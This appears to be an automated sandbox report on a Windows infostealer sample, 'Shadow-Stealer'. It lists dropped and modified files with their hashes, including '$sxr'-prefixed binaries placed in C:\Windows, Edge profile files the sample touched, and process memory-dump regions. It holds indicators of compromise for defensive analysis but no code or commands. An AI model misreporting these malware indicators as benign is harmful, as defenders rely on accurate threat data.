C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
2KB
MD525a26b8c3416b8b9aa406bd4bbadfb5e
SHA1677fdf250c5fddef5aa8827e9d2f7debfe475210
SHA256dba247f47aa1164dc25aac7cc0a169b6a43f6e4fc02bf58ddef168dad445195d
SHA512246fafea4d7e603bfafb5654bef35e7c9308cd2ac22ef932db0ad56853d06ec4a56f76f45049f85057ecf55d433d21695c4b670dc66cf2b2048f6897cb30ea95
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
2KB
MD5a00aa49bb4262c5879ee124ba663df57
SHA102f8d07236b1cd07bb2dd5c901953bc4de92e515
SHA256bbf33658bf92ed5ef5016ea206b043a80c85d1a5e38c037e03241b8841edce3c
SHA512dbda6588290e474a716e1d5bb6e55da4b76c2d1b890e9cee99993aacbf8a357d8163bbb2f58762c0121addffafe9a8fb653ef4430a18429d6df430749ce0fc1e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
2KB
MD5ab1b300fa63bfbdda59a6813bbfba12a
SHA1b7c7293715563b202c6e668d648e20eeda0af56e
SHA256586d0230343f60f7cbf9afff6a86c1c572d0edcaef8e34de5f3bd0c1ec7a394f
SHA512c925ce7b1334a3de6a2653c90411ae452ccefda8598e86b18c5a0e8067534dbbae31e4d9e027cf64a0f9f670daa9d71e3fa8df1cb09e6792ccc1cad7ca661f3b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
595B
MD555c1f7bff501bd7f6baed810c9833671
SHA103df557ee6275d32f80932bd9639435ba31aa3c8
SHA25695d61c2bcb097ab5caca96f244252bc8eda212ca1bf839804ce8598a3eeae34b
SHA512ad3416ec54f4d763dcf033a30a8fa840e68dd449d52250073ab163c8e83e012a0afb386a195db8129e83512d6c81c58cf62bf6279ca7dbe350b1ba452d7eea0b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
678B
MD583f65a45c1824322e468923d39173c05
SHA1c30ba81c98d4f3b67d23791db398b3c82a6d0a24
SHA2561ee1f2fa5ef47193e6a59f4743aff91ab81fbca43292487ce85623f6d18b2ed0
SHA512c44da4b2ce7e639e8e3090adf47bf9451b8df3e08e83020a60f1cc0f5bd7a3bf2ffde4b0c700443e97280a59e9067cedd3f999e541844ffab3adbd9b887c91d4
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
5KB
MD53bcc13187882f005db214ab25d0eab74
SHA1919c17017b8b47ea4bfbba0663fdeb44ec38c29f
SHA25633ed20bc29940106a6d31d04b30e259bdaa1b678de1e682d5187fabfb8114268
SHA51204179203414f30a18fbf0189ba2c56cf034358b023ba222c92456db187823a673f68edf786a4cf37f88c1f9a4622cb7668dfc704bb4eb7e25e21b02a8ee45abd
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5fa3a7032933b32ca8b677d09b040c2b0
SHA16269bedacd552e160b98d3ed9721c2812afe7b25
SHA2565dd361d462b1868c18678e756399d74459a0ff6612de2bcdf8c4c4bdadf1c9b4
SHA512f6221a13d39d190ac6a7cdf170434f1ae90a346bf3da94f6974dce3a07f3f20e782d8cc98afd01c7365a46099426abe7654b8604bc51f3e96df0297325371abe
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5f457fbc37da6a68130e0cecbcd69b158
SHA12243d8d629ef73850ff5742e7b51082249aa3067
SHA2565e91369a05af44d86d6eee026665adbeca35ace3f7a4c05ed9e3d9c2a1ab0e14
SHA512f82d8a58f1edd850518abb9ff8bae1437a7f019b68433c266162eac18305a9627c9b0d201277234dfe99647417e89f785b214f66d1d9b59d9548b9f974991cf5
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
1KB
MD5ab0fa8c162b50d19c1e9ac97b33f967d
SHA116647ab0147882f8b8fec806127593031feb6c2f
SHA256fc49db963109394857b1c7c6dc60b1c54814cbfc63e4609a2a57df75f65ced77
SHA512d3e8aa27cd2625094d15b3e829cca61b870166c43b68f6866e3ae99318b029bbdedeaba7822b2597a1cd1b2002ca6542928e3456a075723fca05f4d276b89e8e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
1KB
MD5f5560b8904dd237e0e0e2983446b3284
SHA1376ad60d6bc80d8dd2d94cf60fe40bb9f1372158
SHA25644c8953d7b9ddae995510c82660b0e40ad41c41af7ca56d2cfcbed31938b4efa
SHA5127c702ff10990aa5e6b3516ef3cd12fe26f6fac8370f70bda779da44596450e6c348e3d9b63af6d92a25cc3959baa9a9a0164de0833a9acbc6d2f88fcd2864730
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
1KB
MD5fb737b6623c55f9db4ab17816fa30ea7
SHA1c8f8fb40d993011349207d36ca153e7644bce98c
SHA256ea0dd01e51c4d7a53ff9d302d62631627eda9aff08f5356a042c17a9e5236253
SHA512631fbd38c744e797f9fa4988a5034671a10cc1e29240c44a488914e76da0e16a6d689b0bc6ffaf169b22e5f946705e403092881c5b1088cdad724a25656d28fe
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
1KB
MD51d37976e2f77224b54c49e9602a54e61
SHA12853a336e0bc7d6c38b09f870b14277535cb86fb
SHA256ce6f42953a1c8119e2ee5c9bc8055121bf68434fbca9467d97c4ef3496f31f1a
SHA5128c6249f4afb63568808da22a9640f74e26a41f1ee6210f9cba856fab2db6f928c2ee2c5c9048ec711c7f79c3905f3eaa054f83ad17f294dec8b381cb48170979
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
1KB
MD5425aeb08ff28ca5ded65df5c80c131b7
SHA1c8a40c146aab4574114a24a5e3a186edc87a125a
SHA256442a3bd6a90d5c1e49f1825d9cd334afb1170ad6ce91b85f50b87d040183f5de
SHA512aba711c5df799aa4b9b3425d68cddd254230d1be2a3317532c88bfb4dfc7d4bddce5515a7b1bdf53f41e88eda3fe35b30b9eed828270ef1ace850544e671278a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58c4e1.TMPFilesize
1KB
MD5a9e094bfe837ef97fdd6c2636c0f2209
SHA1b46e767c5c7ed1f01c28ebde78b9f17623358526
SHA256bcd90ccdb697dd1292a1a6375c31632334ceb1e32ac6e73b99277414d4bfe59a
SHA5122953bb6581d07f0e39a7c807cb4a68dc2060092f03369dffdeb76860d6e7991700ed2164072bd7e83f33d38ab3273d3df33fed67a7a0ce395b375a44aa009f78
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\ab2c1477-c56b-40e8-9ce6-6f51ba6306d2\1Filesize
7.5MB
MD56fe3f151cbe46134da5c593e99364851
SHA1d33d6727f1ea7eb5e2c74bcfa994f2743a1505fc
SHA2567851ea0840116de2ef9bcc682f1e67f81cdb713c13ef6797c22fbd17e5f7ea2d
SHA512d10017c8fa3140082cd8f174d2bb4597bac18a465c42ce7eb1b6ce6b79d153c5cbab632fe4bb15e28ebd288073ab504b317dc7a50553b5701782e19ac4338986
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD594acf78e23b061d2e4c4ac44dd9ebc64
SHA1e1f9ec9d6e710d84f7514d7dba61ac612fd322a9
SHA25699d45576ebc1c5e98843594418ae66ba65dfc9983ac3634509f9009dd99f9ec2
SHA51269e1d3a6aabcee1d661e5d97c2a7f6c5a5f6de616f69aada789c401be3a8b2ca9758551992595573222b319b17ba1d83753365ad6a68b1d584150a17cfc07ef2
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
12KB
MD5196b1dbaff732636b069bf58de959efe
SHA1987a287689b564db833b218637745b47a887ea47
SHA25648413ff14f29af3b66678c40c46091c4ff71015f5ed3c91104d371fe12a304c8
SHA512fea45433b06e21561f0cda697538df4c8e85b1bd401c6f92cff967c42d15ac3f7c1c15f3cb84cc07c7b68dcc29ffb9b3189b5343ebd300dae55e0aa8be200150
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
12KB
MD5b29ef581c3d0e11e572a747353d724e1
SHA1d56f295929db4a5bd14936d103a487199f5c8629
SHA256f78f81ab9c22888adbc8fbfeec081a697d991de4cc1a20a958bfc831ef84740e
SHA5128649e18566c1d66dfde2612044070fcd099a146ef9c58c528378b0cf76151cbc4daf811a37c3c342bf4b757fb0e626b37e64271f99a7c28e9c82984ec3f06c23
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
12KB
MD55b6a0098c5167cb301633198797f4232
SHA11a5c7859800d6e975dc86190e7026d8c327fa018
SHA256c84796f28de39bdaa9ccea6e02f5a515545c29eabf4fc9993a8b581fd2fbc70a
SHA512f9f619cf84b3d9f8315d4486787a3dd13a58fd6e7cf837f237564f9dee376f7255b88c80c5c84414e00e329c6a463d8283d3ffeda90c069184dd5eb2c8cee338
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.dbFilesize
14KB
MD599bc31e04db1d9a24cf1dfa75732f3f0
SHA16c4dd942cb32bd693fe3e77a6e399d3938921ae8
SHA256fecd95c2baf6e6de1526bd23c537c1baf54c1a70f78da534057b60179a126d9c
SHA51205c1808f1d9763dcbae1d675ae5d59142bc3b784be2c3938cafc388c3a73fa923813cb4d8fa1969d205179dee2586bb87aed710523a66cb92076dff52d3bcb70
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD559d37a8c588c83e806678c7fb5d1229f
SHA14396d68567f30f08e08a269802fe3f4784b88c5b
SHA256c1af181e4703177ae1c55f2160c6b7685f3536da35a1501e4a70e25155519e84
SHA51219223db6932776bdfcd8202a8ca19e60deacacdc6e44f2f219b541b4e2eadb82c7c819512f17c76f9ca177ca89452adbebf30dceef9fcc05085472ff49ea8dc2
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.datFilesize
10KB
MD59a7af7f1f08f7de9da3ba647286ee5a6
SHA1d7a23961ba5f8c4242a03f20686ff516c2ae432c
SHA256dddc3d322b46ec53927c26326a4f4d573dec131fbe668450f984c91c3104a08b
SHA51264b0d94e68aa2d0ee9d02f170de6989f5255c5c57d05dffbf4dbbe012dae43a6f4dbd59c6a85fd2621fb84ae7f4cdf486a089b90e3e6c4fce1b152ba5aa6ba58
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.datFilesize
10KB
MD535745802ec2865acb4c60e651e5a8620
SHA1f10c746a71c2741790aa3f5160ea7d9be1a1920a
SHA256ef386e977e9fcfc811f2710d0d630e23e2278cf9811770da0c2f10f3965b7a63
SHA5120031f739cafa1089dc655a3509bc215fc900c20734507a1b0b69f1ad1567fb2fe4af725360cf952a4689e89973bbd59a53ea6ff8bd6c4c67b9e732f66f14a42f
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_12abi4ne.xje.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\$sxr-Logs\2024-06-30Filesize
320B
MD5eac6f5ecbbd53cde039298927fee7bf2
SHA15cf40b1cdb78967fb9a0fd810f12e603885ed0aa
SHA2566bc11fb099fb5db9fe6dce10c8030cd79e72c015a8aef5af223bc0e28a9b09fa
SHA51287d7e5292e815307e05b30cef6546f3235cb425f964ca60f0632dbe2738109d8b0269a49d91567f4a27981e8a1c952f778099819dd2ed1ffb50d241573695360
-
C:\Users\Admin\AppData\Roaming\$sxr-Logs\2024-06-30Filesize
400B
MD5bde548ba96f17ed3fe6405321d275d13
SHA194bd70f0ac8389e0fc44ba781cff12cc7655ddf5
SHA256d60e1b5a036b719b797e9f1b713d61ce1171d92473a6da3cb7686a957439ad9f
SHA5120b5aabfd2b267f0f7b5ea4b5cb0c1f9d1e4c594d97f951bd174dbc3bd268a1c578212b98dc88fa69c42508c01d92ef2353a172cb9e601ea640d711e8a529e3ea
-
C:\Users\Admin\Downloads\Shadow-Stealer.bat.exeFilesize
440KB
MD50e9ccd796e251916133392539572a374
SHA1eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204
SHA256c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221
SHA512e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d
-
C:\Users\Admin\Downloads\Shadow-Stealer.bat:Zone.IdentifierFilesize
26B
MD5fbccf14d504b7b2dbcb5a5bda75bd93b
SHA1d59fc84cdd5217c6cf74785703655f78da6b582b
SHA256eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913
SHA512aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98
-
C:\Users\Admin\Downloads\Unconfirmed 690217.crdownloadFilesize
12.5MB
MD5cf5b412ffc3ce43cd7ddce602fc67f56
SHA1221dfcd0868158f676c472d8a5bcf9647f0c7d51
SHA25684ba648cfdd5c2ae8d3292fcc1702e385a1a26e915bd7275b5fde776212f2724
SHA512695489d3b02863c382dc4b044bd80825b3f46eadfe4647619a0036da7ab3405b7925e89a457b19ee57995a59dcf8d5f9df237cd4d5d59a6cee3914aeaee2a8ef
-
C:\Windows\$sxr-cmd.exeFilesize
324KB
MD5c5db7b712f280c3ae4f731ad7d5ea171
SHA1e8717ff0d40e01fd3b06de2aa5a401bed1c907cc
SHA256f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba
SHA512bceaf7dc30f2c99b40b7025a5eb063f3131a1ef9349fdf356720eaef838bcf58ce3d5e3bad9459ddd2f872df430bdb66a766a5acff5d3bbc738eba8945cb0a89
-
C:\Windows\$sxr-mshta.exeFilesize
32KB
MD5356e04e106f6987a19938df67dea0b76
SHA1f2fd7cde5f97427e497dfb07b7f682149dc896fb
SHA2564ed8a115fa1dcfd532397b800775c1b54d2d407b52118b5423e94ff1ce855d7e
SHA512df1c655fa3a95e001084af8c3aa97c54dbcb690210e1353dd836702cfb4af3c857449df62aa62d7ab525ffb4e0dc1552181dfcdee2c28f4af5c20df6d95811cd
-
\??\pipe\LOCAL\crashpad_2044_LTYXBSGMNMGLCRBTMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/428-658-0x000001DD8A3F0000-0x000001DD8A417000-memory.dmpFilesize
156KB
-
memory/428-659-0x00007FFB3E190000-0x00007FFB3E1A0000-memory.dmpFilesize
64KB
-
memory/460-670-0x00007FFB3E190000-0x00007FFB3E1A0000-memory.dmpFilesize
64KB
-
memory/460-669-0x00000199BA000000-0x00000199BA027000-memory.dmpFilesize
156KB
-
memory/628-660-0x00007FFB3E190000-0x00007FFB3E1A0000-memory.dmpFilesize
64KB
-
memory/628-653-0x0000028CBBCF0000-0x0000028CBBD17000-memory.dmpFilesize
156KB
-
memory/628-652-0x0000028CBBCC0000-0x0000028CBBCE2000-memory.dmpFilesize
136KB
-
memory/636-683-0x0000028C682A0000-0x0000028C682C7000-memory.dmpFilesize
156KB
-
memory/636-684-0x00007FFB3E190000-0x00007FFB3E1A0000-memory.dmpFilesize
64KB
-
memory/692-663-0x00007FFB3E190000-0x00007FFB3E1A0000-memory.dmpFilesize
64KB
-
memory/692-656-0x000001EB11B90000-0x000001EB11BB7000-memory.dmpFilesize
156KB
-
memory/772-674-0x00007FFB3E190000-0x00007FFB3E1A0000-memory.dmpFilesize
64KB
-
memory/772-673-0x000001C17FB30000-0x000001C17FB57000-memory.dmpFilesize
156KB
-
memory/936-687-0x00007FFB3E190000-0x00007FFB3E1A0000-memory.dmpFilesize
64KB
-
memory/936-686-0x000001CBEEED0000-0x000001CBEEEF7000-memory.dmpFilesize
156KB
-
memory/984-665-0x00000270F6F60000-0x00000270F6F87000-memory.dmpFilesize
156KB
-
memory/984-666-0x00007FFB3E190000-0x00007FFB3E1A0000-memory.dmpFilesize
64KB
-
memory/996-583-0x0000000000400000-0x0000000000406000-memory.dmpFilesize
24KB
-
memory/996-582-0x0000000000400000-0x0000000000406000-memory.dmpFilesize
24KB
-
memory/1168-690-0x00007FFB3E190000-0x00007FFB3E1A0000-memory.dmpFilesize
64KB
-
memory/1168-689-0x0000023321E90000-0x0000023321EB7000-memory.dmpFilesize
156KB
-
memory/3408-581-0x0000000140000000-0x0000000140004000-memory.dmpFilesize
16KB
-
memory/3408-580-0x0000000140000000-0x0000000140004000-memory.dmpFilesize
16KB
-
memory/4700-648-0x00007FFB7E100000-0x00007FFB7E309000-memory.dmpFilesize
2.0MB
-
memory/4700-649-0x00007FFB7DB10000-0x00007FFB7DBCD000-memory.dmpFilesize
756KB
-
memory/4700-647-0x0000000140000000-0x0000000140028000-memory.dmpFilesize
160KB
-
memory/4700-646-0x0000000140000000-0x0000000140028000-memory.dmpFilesize
160KB
-
memory/4700-650-0x0000000140000000-0x0000000140028000-memory.dmpFilesize
160KB
-
memory/4820-571-0x0000020EB0B10000-0x0000020EB1560000-memory.dmpFilesize
10.3MB
-
memory/4820-579-0x0000020E981E0000-0x0000020E981EA000-memory.dmpFilesize
40KB
-
memory/4820-559-0x0000020EB0540000-0x0000020EB0562000-memory.dmpFilesize
136KB
-
memory/4820-568-0x0000020E981A0000-0x0000020E981C4000-memory.dmpFilesize
144KB
-
memory/4820-570-0x00007FFB7DB10000-0x00007FFB7DBCD000-memory.dmpFilesize
756KB
-
memory/4820-569-0x00007FFB7E100000-0x00007FFB7E309000-memory.dmpFilesize
2.0MB
-
memory/4820-573-0x0000020EB1560000-0x0000020EB1606000-memory.dmpFilesize
664KB
-
memory/4820-574-0x0000020EB1610000-0x0000020EB1666000-memory.dmpFilesize
344KB
-
memory/4820-575-0x0000020EB1670000-0x0000020EB16C8000-memory.dmpFilesize
352KB
-
memory/4820-576-0x0000020E981C0000-0x0000020E981E2000-memory.dmpFilesize
136KB
-
memory/4820-577-0x00007FFB7E100000-0x00007FFB7E309000-memory.dmpFilesize
2.0MB
-
memory/4976-631-0x000001B33B3D0000-0x000001B33B482000-memory.dmpFilesize
712KB
-
memory/4976-628-0x000001B33B2C0000-0x000001B33B310000-memory.dmpFilesize
320KB
-
memory/4976-620-0x000001B3431B0000-0x000001B3435EE000-memory.dmpFilesize
4.2MB
-
memory/4976-644-0x00007FFB7DB10000-0x00007FFB7DBCD000-memory.dmpFilesize
756KB
-
memory/4976-619-0x000001B3429E0000-0x000001B3431AA000-memory.dmpFilesize
7.8MB
-
memory/4976-618-0x000001B33A380000-0x000001B33A906000-memory.dmpFilesize
5.5MB
-
memory/4976-617-0x00007FFB7DB10000-0x00007FFB7DBCD000-memory.dmpFilesize
756KB
-
memory/4976-616-0x00007FFB7E100000-0x00007FFB7E309000-memory.dmpFilesize
2.0MB
-
memory/4976-622-0x00007FFB7E100000-0x00007FFB7E309000-memory.dmpFilesize
2.0MB
-
memory/4976-621-0x000001B3435F0000-0x000001B3436A2000-memory.dmpFilesize
712KB
-
memory/4976-643-0x00007FFB7E100000-0x00007FFB7E309000-memory.dmpFilesize
2.0MB
-
memory/4976-645-0x000001B33B350000-0x000001B33B386000-memory.dmpFilesize
216KB
-
memory/4976-632-0x000001B33B660000-0x000001B33B822000-memory.dmpFilesize
1.8MB
-
memory/4976-641-0x000001B33B310000-0x000001B33B34C000-memory.dmpFilesize
240KB
-
memory/4976-933-0x000001B33C0C0000-0x000001B33C5E8000-memory.dmpFilesize
5.2MB
-
memory/4976-642-0x000001B33AC60000-0x000001B33ACAE000-memory.dmpFilesize
312KB
-
memory/5684-2565-0x000002A072C90000-0x000002A072D42000-memory.dmpFilesize
712KB
-
memory/5832-1521-0x0000022FA7B00000-0x0000022FA7B24000-memory.dmpFilesize
144KB
-
memory/5832-1634-0x0000022FA7C40000-0x0000022FA7C62000-memory.dmpFilesize
136KB